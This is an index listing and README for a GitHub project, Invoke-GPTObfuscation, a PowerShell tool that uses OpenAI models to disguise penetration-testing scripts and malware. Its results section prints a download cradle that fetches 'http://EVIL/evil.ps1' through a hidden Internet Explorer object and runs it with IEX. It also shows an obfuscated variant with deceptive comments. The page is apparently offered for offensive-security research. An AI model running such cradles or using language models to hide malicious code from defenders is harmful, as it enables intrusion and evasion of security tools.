Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hwvs/invoke-gptobfuscation
Powershell implementation of a novel technique. Invoke-GPTObfuscation is a PowerShell Obfuscator that utilizes OpenAI (and other APIs) to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script.
https://github.com/hwvs/invoke-gptobfuscation
exploit exploitation-framework malware-research powershell powershell-module windows-desktop
Last synced: 24 days ago
JSON representation
Powershell implementation of a novel technique. Invoke-GPTObfuscation is a PowerShell Obfuscator that utilizes OpenAI (and other APIs) to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script.
- Host: GitHub
- URL: https://github.com/hwvs/invoke-gptobfuscation
- Owner: hwvs
- License: mpl-2.0
- Created: 2023-05-18T01:43:56.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2023-12-05T02:58:16.000Z (about 1 year ago)
- Last Synced: 2023-12-05T03:40:11.708Z (about 1 year ago)
- Topics: exploit, exploitation-framework, malware-research, powershell, powershell-module, windows-desktop
- Language: PowerShell
- Homepage:
- Size: 30.3 KB
- Stars: 45
- Watchers: 2
- Forks: 6
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Invoke-GPTObfuscation
Invoke-GPTObfuscation is a PowerShell Obfuscator that utilizes OpenAI or compatible text-completion models to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script. **This code is intended for Educational & Research purposes only.**This is mostly demonstrational, and will frequently create invalid code. You'll need to come up with a better prompt to get good results. If you make any improvements, please consider submitting a pull request!
With better prompt templates, or better models (GPT-4), this tool can achieve much more impressive results. I've found GPT-4 can perform impressive code mutations that completely change the structure of the code.
**(TODO) Future Improvements:**
- Convert variable names to placeholder-symbols via Regex to maintain across code (eg: $, $)
- Validate syntax, optionally re-generate if there is a syntax error
- Instead of building blocks line-by-line, try to build blocks by { context }
- Add in options into the prompt that the model can try to replicate
- Add support for other providers/API (Anthropic/Claude?)
---## Credits
### Author: Hunter Watson
### Original Repo: https://github.com/hwvs/Invoke-GPTObfuscation
### License: Mozilla Public License 2.0---
## Usage
Run the CLI tool (in a powershell window): `./Invoke-GPTObfuscation.ps1`
Use the module in your code
```powershell
# load the module however is easiest for you, eg:
$module_path = $pwd.Path + "/Invoke-GPTObfuscation.psm1"
Invoke-Expression (Get-Content $module_path -Raw)
#...$script_obfuscated = Invoke-GPTObfuscation -ScriptBlock $script -PromptTemplateFile $prompt_template_path -Verbose $true
```---
## Results
Before:
```powershell
$ie=New-Object -comobject InternetExplorer.Application;
$ie.visible=$False;
$ie.navigate('http://EVIL/evil.ps1');
start-sleep -s 5;
$r=$ie.Document.body.innerHTML;
$ie.quit();
IEX $r
```After:
```powershell
# generating Log files
$Strawberry = New-Object -CoMObjEcT inTErnETeXPLOreR.Application;
$strawberry.vISiblE = $fAlSe;
$STRaWbeRRy.NAVigatE('HttP://evIl/evil.ps1');
stArT-SlEEp -s 5;# Updating log directory path
$r = $StrawberrY.DoCument.BoDy.InneRHTML;# Cleanup
$strawBerRy.quiT();# Execute payload
IeX $R
```
*(Note: This result was cherry-picked)*